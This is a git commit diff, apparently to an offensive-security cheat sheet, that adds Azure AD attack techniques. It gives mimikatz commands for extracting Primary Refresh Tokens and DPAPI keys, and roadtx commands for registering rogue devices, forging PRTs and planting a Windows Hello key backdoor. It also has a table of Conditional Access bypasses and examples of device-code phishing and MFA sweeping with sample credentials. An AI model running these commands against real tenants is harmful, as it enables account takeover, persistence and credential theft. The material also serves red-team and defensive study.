AAD PRT + Conditional Access Policy

pull/1/head
Swissky 2023-11-20 23:20:18 +01:00
parent 24fe926630
commit 23b16ca0de
5 changed files with 58 additions and 7 deletions

Binary file not shown.

Before

Width:  |  Height:  |  Size: 2.2 MiB

After

Width:  |  Height:  |  Size: 1.2 MiB

View File

@ -95,6 +95,16 @@ Mail.ReadWrite.All https://graph.microsoft.com 00b41c95-dab0-4487-9
```
### Extract PRT v1
```ps1
mimikatz # sekurlsa::cloudap
mimikatz # sekurlsa::dpapi
mimikatz # dpapi::cloudapkd /keyvalue:<key-value> /unprotect
roadtx browserprtauth --prt <prt> --prt-sessionkey <clear-key> --keep-open -url https://portal.azure.com
```
### Extract PRT on Device with TPM
* No method known to date.
@ -103,11 +113,17 @@ Mail.ReadWrite.All https://graph.microsoft.com 00b41c95-dab0-4487-9
### Generate a PRT by registering a device
```ps1
roadtx interactiveauth -u user.lastname@domain.local -p password123 -r devicereg
roadtx device -n devicename
roadtx prt -u user.lastname@domain.local -p password123 -key-pem devicename.key -cert-pem devicename.pem
roadtx prtenrich prt roadtx.prt
roadtx prt -u user.lastname@domain.local -p password123 -key-pem devicename.key -cert-pem devicename.pem -r 0.AVAApQL<snip>
# Get correct token audience
roadtx gettokens -c 29d9ed98-a469-4536-ade2-f981bc1d605e -r urn:ms-drs:enterpriseregistration.windows.net --refresh-token file
# Registering device
roadtx device -a register -n <device-name>
# Request PRT
roadtx prt --refresh-token <refresh-token> -c <device-name>.pem -k <device-name>.key
# Use a PRT
roadtx browserprtauth --prt <prt-token> --prt-sessionkey <prt-session-key> --keep-open -url https://portal.azure.com
```

View File

@ -25,7 +25,24 @@
### Join Devices
* [Enroll Windows 10/11 devices in Intune](https://learn.microsoft.com/en-us/mem/intune/user-help/enroll-windows-10-device)
### Register Devices
```ps1
roadtx device -a register -n swkdeviceup
```
### Windows Hello for Business
```ps1
roadtx.exe prtenrich --ngcmfa-drs-auth
roadtx.exe winhello -k swkdevicebackdoor.key
roadtx.exe prt -hk swkdevicebackdoor.key -u <user@domain.lab> -c swkdeviceup.pem -k swkdeviceup.key
roadtx browserprtauth --prt <prt-token> --prt-sessionkey <prt-session-key> --keep-open -url https://portal.azure.com
```
# Service Principals

View File

@ -22,17 +22,30 @@ Invoke-AADIntReconAsOutsider -UserName "user@company.com" | Format-Table
```
## Azure AD - Conditionnal Access Policy
## Azure AD - Conditional Access Policy
Enumerate Conditionnal Access Policies: `roadrecon plugin policies`
Conditional Access is used to restrict access to resources to compliant devices only.
* Enumerate Conditional Access Policies: `roadrecon plugin policies` (query the local database)
| CAP | Bypass |
|---------------------------|---------|
| Location / IP ranges | Corporate VPN, Guest Wifi |
| Platform requirement | User-Agent switcher (Android, PS4, Linux, ...) |
| Protocol requirement | Use another protocol (e.g for e-mail acccess: POP, IMAP, SMTP) |
| Azure AD Joined Device | Try to join a VM (Work Access)|
| Device requirement | / |
| MFA | / |
| Legacy Protocols | / |
| Compliant Device (Intune) | / |
| Domain Joined | / |
## Azure AD - MFA
* [dafthack/MFASweep](https://github.com/dafthack/MFASweep) - A tool for checking if MFA is enabled on multiple Microsoft Services
```ps1
Import-Module .\MFASweep.ps1
Invoke-MFASweep -Username targetuser@targetdomain.com -Password Winter2020
Invoke-MFASweep -Username targetuser@targetdomain.com -Password Winter2020 -Recon -IncludeADFS
```

View File

@ -83,6 +83,11 @@ roadtx codeauth -c <app-id> -r msgraph -t <tenant-id> <0.A....> -ru 'https://<ph
## Device Code Phishing
* Using roadtool: `roadtx gettokens -u user@domain.lab --device-code`
```ps1
roadtx.exe auth --device-code -c 29d9ed98-a469-4536-ade2-f981bc1d605e
Requesting token for resource https://graph.windows.net
To sign in, use a web browser to open the page https://microsoft.com/devicelogin and enter the code XXXXXXXXX to authenticate.
```
* Using TokenTactics to request a token for Azure Graph API using a device code
```ps1